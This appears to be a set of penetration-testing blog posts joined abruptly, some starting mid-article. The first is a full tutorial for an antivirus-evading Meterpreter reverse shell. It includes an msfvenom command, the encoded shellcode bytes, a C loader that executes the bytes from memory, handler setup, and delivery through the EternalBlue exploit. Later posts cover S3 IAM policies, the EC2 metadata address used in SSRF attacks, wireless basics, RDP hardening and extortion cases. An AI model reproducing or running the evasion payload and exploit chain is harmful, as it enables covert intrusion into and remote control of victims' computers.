To increase our overall success rate of exploitation we will create a custom meterpreter reverse_tcp payload.

To do this we will first need a few things:

1. Visual Studio 2019 Community (Free): https://visualstudio.microsoft.com/downloads/
2. Metasploit Framework: https://github.com/rapid7/metasploit-framework

TLDR

We will create shellcode with msfvenom, encode it, paste it to a custom template, and deliver the compiled binary as a custom payload with metasploit.

Windows Shellcode: x86 or x64?

Several years ago it was very common for x64 binaries to fly by Windows Defender, however AV products have greatly improved recently and begun to detect x64 meterpreter payloads we tested. Very few encoders support x64 shellcode which further reduces our ability to create stealthy payloads. In our testing we find that building x86 payloads with the shikata_ga_nai have stood the longest test of time and are still able to evade most AV engines.

Meterpreter payloads: which one?

You can view a list of payloads by running msfvenom -l payloads, we will use the reverse_tpc staged payload:

windows/meterpreter/reverse_tcp                     Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker

Note: our selected payload windows/meterpreter/reverse_tcp payload is considerably different than the windows/meterpreter_reverse_tcp payload. The second / indicates the payload is staged and will connect back to our handler to deliver the complete meterpreter payload.

Shellcode Encoder

You can view all available encoders by running msfvenom -l encoders. We see the most success using x86/shikata_ga_nai with a number of iterations.

    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder

Creating the shellcode with Msfvenom

Now we will use msfvenom to export the reverse_tcp payload as encoded shellcode. You will need to change the IP and port to that of your listener. You may also wish to change the number of iterations (-i 8), using up to 25 should be safe in most situations:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c

In the output of this we’re interested in Payload size: line, in this example we have 557 bytes

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 8 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai chosen with final size 557
Payload size: 557 bytes
Final size of c file: 2366 bytes

In our shell.c output we have the following shellcode:

unsigned char buf[] =
"\xdb\xdd\xd9\x74\x24\xf4\x5a\x31\xc9\xbb\x3b\xe2\xb0\xc9\xb1"
"\x85\x31\x5a\x19\x03\x5a\x19\x83\xea\xfc\xd9\x17\x0d\xc1\xab"
"\x37\x0a\x09\x07\x1e\xa7\x89\x53\xfb\x61\x1b\x2a\x82\x40\xf1"
"\x59\xf8\x61\x01\x62\x94\x74\xe8\x99\x05\x5b\x51\xe8\x63\xe4"
"\x2a\x87\xcc\xea\xfb\x81\x45\x6b\x9a\xbd\x83\x08\x50\xde\x32"
"\x65\x18\x9c\x35\x5b\x77\x9a\x64\xea\x8f\xfa\x13\x1f\x28\xe1"
"\xb9\xfd\xe2\x22\xba\x07\xd5\xe0\x74\xea\xb8\x9c\x81\x28\x24"
"\x11\x81\x75\x4c\xca\x2b\x53\x3f\x7e\xa4\x88\xf8\xaa\x76\x43"
"\x4d\xec\x6d\xca\xf9\xd8\x3f\xf6\x11\xde\x11\xc3\x16\x02\xa5"
"\x04\x32\x29\x21\xc9\x4e\xdf\xa8\xcf\xdc\xd7\x81\x91\xce\x08"
"\x3b\xf8\x72\xc1\xca\x3c\x89\xee\xcd\x89\xab\xa2\xcf\x82\x5d"
"\xdf\x24\xc9\xdb\x19\x83\xa6\x73\xff\xa9\xe4\xce\x23\x0e\xf2"
"\x5a\x1b\x49\x6f\x5c\x32\xa1\x17\xc6\x6a\x83\xfb\xb1\x61\x3c"
"\x63\x1f\x31\xa8\x1e\x53\x68\x3a\xe0\xe5\x17\xb6\x02\x37\x3e"
"\xa2\xbb\xb0\xe1\xb8\x54\x73\xf2\x17\xc6\xad\xe2\x0d\xb0\x84"
"\x56\x54\x82\x23\x79\x1f\x4e\xee\x94\x8f\x3a\xe1\x10\x06\x45"
"\xf9\xb9\x8a\x65\xfd\x02\xc9\x07\xce\xb4\x61\x92\x74\xdf\x14"
"\x47\x19\x51\xe4\x9d\xd8\xa8\x13\xbf\x50\x5b\xf9\x1e\x2d\x48"
"\x8e\x2f\x12\x43\x44\x1f\x9a\xe1\x53\xff\x0b\x33\xd8\x66\xbc"
"\xf2\xfc\xc9\x51\xbd\x2a\x19\xe9\xd5\xbc\x9e\x5f\x72\xcf\x8a"
"\x81\x42\x1c\xd8\x0e\x8c\xed\x75\xfe\x7a\x5d\x72\xff\x81\x09"
"\xa4\x1b\x91\x74\x31\x32\xc5\xd3\x7b\xd0\xd3\x58\x2a\x61\xc0"
"\xdd\x2a\xdc\xe5\x84\x8d\x75\x99\xf8\x66\xcc\x72\xdc\x55\x98"
"\x40\xcf\xc3\xcf\xdb\x02\x61\x0c\xd9\xa4\xf0\x20\xcf\xdb\x3f"
"\x1c\x54\x05\x4d\xe6\xf1\x3a\xd2\x5b\x0c\x4b\x52\x6e\x0c\xfe"
"\xee\x89\x4e\x4c\x17\x55\xc7\x42\x3e\xfd\x8a\xaf\xdf\xe5\x69"
"\xc9\x10\x48\xc6\xab\x85\x41\x23\x4a\xbe\xc4\x85\x27\x5e\x74"
"\xa8\xc3\x9b\x3f\x24\xcc\x4e\x0f\xe0\x54\x26\x0a\x95\x12\x97"
"\x61\x8d\xa8\x90\x95\x1d\x40\x29\x0c\x9a\xf8\xcf\x35\x2f\x64"
"\x27\xc4\x75\x2e\x13\x7a\x12\x7c\x46\x83\xd6\xcf\x18\x41\x1e"
"\x03\x74\xb6\xc7\x90\x7e\x22\x72\xfc\x59\x67\x84\xb5\xe6\x3e"
"\x47\xcd\xbb\xa2\xab\xa3\xb4\xfe\xc2\x6f\x38\x49\xf9\xec\x59"
"\x81\x15\x7b\x10\xc0\x3b\x05\xe1\x5c\xac\x08\x85\x2f\x3f\x90"
"\x29\x2e\xcd\xaa\x4e\x6f\x9f\x9c\xe9\x97\x96\x3f\xb0\xd4\xc1"
"\x64\x22\x20\xe5\xdc\x5a\x0f\x7f\x77\x37\xd1\x51\x77\xa4\x10"
"\xed\x58\xd0\xbb\x62\xa9\x8f\x30\x8e\xa1\x1d\x0d\x73\x3d\x3f"
"\xcb\xf4\xfe\x06\x81\xc6\xf2\x03\xc7\x22\xf0\xeb\x0e\x61\xe6"
"\x5c\xc5";

Create a Visual Studio Project

Open Visual Studio and press “Create a new project”:

Select “Empty project”:

Choose a project name and press “Create”:

In “Source Files”, right click to add a “New item”:

Select cpp file and name this “main.cpp”:

Create a custom template

In your main.cpp file we will paste the following code:

#include <stdio.h>
#include <windows.h>

unsigned const char payload[] = "";

size_t size = 0;

int main(int argc, char** argv) {

    char* code;

    printf("This is just a random string!\n");

    code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE);

    memcpy(code, payload, size);

    ((void(*)())code)();

    return(0);
}

We just need to change two things:

1. Add the “Payload size” number (do not use the “Final size of c file”) from when we generated the payload. In this case it was 557 bytes:

2. Replace the placeholder in payload[] with the shellcode generated in buf[]:

3. Add some random text so we don’t all use the same signatures!

4. In the build dropdown select release:

5. Hit Ctrl+B and your payload should be built!

Note: If you encounter errors regarding vcruntime140.dll the system may not have the Visual Studio Runtime installed; you may encounter this on minimally built server. To avoid this you can go to Project Properties and change the runtime library to Multi-threaded (/MT) which will create a statically linked binary. This however will be a larger binary and far more prone to detection by AV. Use this only as a last resort!

Starting a meterpreter handler

On our attacking system we will now create a handler to accept incoming connection from our payload. We should ensure the IP and port are the same as used in previous steps:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.5
LHOST => 10.0.0.5
msf5 exploit(multi/handler) > set LPORT 9090
LPORT => 9090
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.0.0.5:9090

To launch our shiny new payload as part of an exploit, we can use the generic/custom payload and specify the filename of our binary:

msf5 > use windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload generic/custom
payload => generic/custom
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payloadfile /home/demo/Project1.exe
payloadfile => /home/demo/Project1.exe
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.30
RHOSTS => 10.0.0.30
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

The post Evading Antivirus with Better Meterpreter Payloads appeared first on Virtue Security.

IAM Policies

Unlike ACLs and bucket policies, IAM policies are targeted at IAM users/groups instead of S3 buckets and objects. Using an IAM policy, we can give an IAM user limited access to S3 resources (or any AWS service in general). The following is an example IAM policy:

{
    "Statement": [
        {
            "Effect":"Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:DeleteObject"
            ],
            "Resource":"arn:aws:s3:::examplebucket/*"
        }
    ]
}

This gives the IAM user assigned that policy read access to any object stored in the “examplebucket” S3 bucket as well as the ability to create and delete objects.

Note: The same tests for bucket policies are applied to IAM policies by the AWS Extender Burp extension; however, IAM user credentials must be supplied in this case.

The Intersection of Access Control Mechanisms

When more than one access control mechanism is applied, Amazon decides what to allow based on the union of all of them. For instance, if an IAM policy grants access to an object that a bucket policy denies, that object will not be accessible to the user as an explicit DENY rule always takes precedence over an ALLOW rule. And while any operation that does not have an appropriate ALLOW rule set is rejected by default, a lot of misconfiguration issues can arise due to various mistakes and misunderstandings on the bucket owner’s part; sometimes leaking very sensitive data publicly 

^[4]. It’s also worth noting that Amazon S3 does not have a concept of hidden or internal buckets. As you might imagine, this creates an inherent security problem of bucket name enumeration, so some may consider that when choosing bucket names.

EC2 Metadata IP

AWS provides instance metadata for EC2 instances via a private HTTP interface only accessible to the virtual server itself. While this does not have any significance from an external perspective, it can however be a valuable feature to leverage in SSRF related attacks. The categories of metadata are exposed to all EC2 instances via the following URL:

http://169.254.169.254/latest/meta-data/

We commonly find that image and PDF rendering endpoints such as wkhtmltopdf are susceptible to attacks such as this. If user generated content is used in conjunction with these utilities, it can be used as a vector to access this data.

Cognito Authentication

AWS provides the capability to fully manage authentication of application users via Cognito authentication. This can be integrated with large identity providers like Google, Facebook, Twitter, and custom interfaces as well. This functionality also supports access for anonymous access where anyone can request an access token.

Penetration testers should be aware of this behavior and be able to test for such cases. Our plugin has the capability to test for unauthenticated access when an identity pool is discovered in proxy traffic, however penetration testers should not rely on this scenario for test coverage. Identity pool IDs may often be encoded in token requests sent to cognito-identity.amazonaws.com. Awareness of this behavior is a critical first step to verifying unauthenticated Cognito access. In such situations the plugin can be forced to make the test case by sending the extracted pool ID to any request parameter to allow the plugin to detect it.

Other Cloud Services

Many of the behavior described so far in this series applies to the other major cloud services such as Google and Azure. In part 3 we will look at more examples of those and how they can be tested as well. Please check back shortly!

The post AWS EC2 Penetration Testing appeared first on Virtue Security.

Firstly, let’s start off strong with a brief overview of the fundamentals of wireless network communications. Now I can understand that this part might be a bit dry, but it is definitely necessary to a full understanding of “the big picture”. In addition, I know that some of our readers might already know what is in this section, but a brief refresher never hurt anyone.

In general, there are 2 components to a basic wireless network; the Access Point (Referred to as the AP), and the client. The client and the access point create a connection between each other, and send each other wireless signals (Most commonly over 2.4 and 5Ghz) that are then interpreted on each end. These signals encapsulate packets and have a fixed structure that is dependent on the protocols that are used for that specific sort of communications. The AP then interprets these signals and (in most cases) converts them to regular network traffic, that is then either routed to other wireless clients, or back into the network that the AP is connected to.

Now, with all of this data going over the air, anyone in range would be able to view and modify this traffic. That’s why different encryption methods have been devised to protect this traffic that is otherwise viewable by anyone with a good antenna and a bit of luck. A few of the most common encryption types are WPA, WPA2 (And variants), and WEP.

Source: https://wigle.net/

As you can see in the above graphic, over time there has been a shift in what protocols are used. In the infancy of wireless, there were only open (unencrypted) wireless networks, and WEP encrypted wireless networks, but as time went on, WPA and WPA2x gained popularity for reasons of security. In an open wireless network, any client can connect (also known as “associate”) with the wireless network as long as they are in range. In addition, even if a client is not associated with an open AP, they would still be able to see all traffic going over the air in essentially plain-text (when using special hardware detailed in pt. 2).

In an encrypted wireless network, the connection between the client and the AP is secure in the sense that an outside onlooker, who does not have access to the wireless network (usually through password based authentication) would not be able to view and/or modify the traffic of the clients of that specific network. The first standard form of this type of encryption was called “WEP” (Wired Equivalent Privacy). For some time, WEP was known was the de-facto method for wireless security, until tools, attacks, and methods where developed essentially making this sort of authentication useless. In modern wireless networks, much more sophisticated WPA and WPA2x security is used to better protect these networks. Although these encryption protocols are strong, they all have weaknesses that can be exploited in order to gain access to the AP, Client, or underlining network. Now, it is not just the security of the wireless protocol itself that is important, but what those wireless clients have access to. For example, in a typical home network, the entire wireless and wired network are on the same subnet, and thus a client on the AP can have access to a smart TV hooked up by Ethernet. In addition, home networks usually have WPA/WPA2-PSK encryption that only involves a password for authentication.  

Conversely, in the enterprise, it is best practice to isolate the wireless networks from the rest of the company’s internal network, and only allow wireless clients to access parts of the network on a case-by-case basis. This is called “wireless isolation” and is commonplace in the modern enterprise system. Although it is the better option, a lot of company networks fall victim to negligence during wireless configuration, thus a wireless client will have access to the internal network. This is fantastic from a would-be attacker standpoint, as the wireless network now becomes a more lucrative point of entry. Additionally, in an enterprise, it is possible that the wireless networking system has added layers of security. An example of this would be “Mac address whitelisting”. This is when only a predetermined set of clients are allowed to connect to the AP. The MAC address is data that is unique to the specific wireless adapter installed on a device (i.e. a laptop wireless card, a USB wireless card, a cell phones internal wireless adapter.). Another example would be username/password authentication that could authenticate the user with a Radius, MS Active Directory, or other server.  

Now that we have a solid understanding of the basics of these types of networks, we can move on to learning about their vulnerabilities and how to exploit that, and the first thing we need to cover is hardware. What exactly you are going to need to get going with wireless penetration testing, from a basic USB card to a 2 mile+ packet cannon, this will all be covered in part 2 coming shortly.

Stay tuned at https://www.linkedin.com/company/virtue-security Mark Shasha is a penetration tester at Virtue Security in New York City – @bignosesecurity

The post Wireless Penetration Testing Guide: Part 1 – Intro And Basics appeared first on Virtue Security.

Several risks are associated with this functionality; an attacker is now able to: * Accurately fingerprint the version of Windows * Potentially identify user accounts on the system * Leverage the RDP service to consume excessive system resources The default configuration of RDP is similar to letting anyone into the lobby of your building; while they may not have keys to apartments, we generally don’t want strangers milling around the lobby to gather information if it can be avoided.

Remediation

To enable network level access on Windows 2008 R2 we can do the following:

1. Open the Group Policy Editor by typing ‘gpedit’

2. Navigate to the following:

1. Computer Configuration
2. – Administrative Templates
3. — Windows Components
4. — Remote Desktop Services
5. —- Remote Desktop Session Host
6. —– Security

7. Doubleclick on “Require user authentication for remote connections by using Network Level Authentication”

8. Check ‘Enabled’. Apply. Save.

Changes are immediate, no reboot is required. Network Level Access should now be enabled.

Verification

One of the quickest and easiest ways to verify if NLA is to use the ‘rdesktop’ tool packaged with 

Kali Linux. When NLA is properly enabled, you will get the following error:

root@kali:~# rdesktop 10.0.1.73
Autoselected keyboard map en-us
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
Failed to connect, CredSSP required by server.

For long term solutions to this issue, organizations may wish to make this change part of a hardened standard image used to provision new servers.

The post Enable Network Level Access For Windows RDP appeared first on Virtue Security.

Record Profits

To date, Cryptolocker has compromised almost a quarter million computers and has fetched over $27,000,000 in ransom payouts. Not only does this allow criminals to reinvest substantial funds into newer and more advanced attacks, it set a precedent for other “would be” criminals who may be looking to profit.

Code Spaces

In June 2014 Code Spaces was notified by an unknown attacker that they had gained access to their Amazon EC2 admin tools. Along with the communication came a demand for a large sum of money. When Code Spaces did not deliver the payment, all data backups, virtual servers, and live virtual machines were wiped by the attacker. Code Spaces was forced to close their doors and cease all business operation.

Domino’s Pizza

Also in June 2014 was a compromise of Domino’s systems in France and Belgium. The group Rex Mundi claimed responsibility and threatened to publish stolen data of Domino’s customers unless a ransom of $40,000 was paid. Domino’s announced they had no intention of paying a ransom, and at the time of this writing there is no public resolution available.

Looking Forward

We often hear IT staff dismiss potential threats because their data would not be useful to an attacker, people often say “Why would an attacker be after this information?”. Extortion is becoming a more popular way to monetize on data regardless of the direct usefulness to the attacker. Chances are, if the data is valuable to you, it is now inherently valuable to the attacker also.

The post Extortion is a Rising Motive in New Attacks appeared first on Virtue Security.

The post Win a Ticket to AppSecusa! appeared first on Virtue Security.

To disable WiFi on iOS, under the setting panel, the icon be switched on and off as shown below:

The post WiFi Tracking Services appeared first on Virtue Security.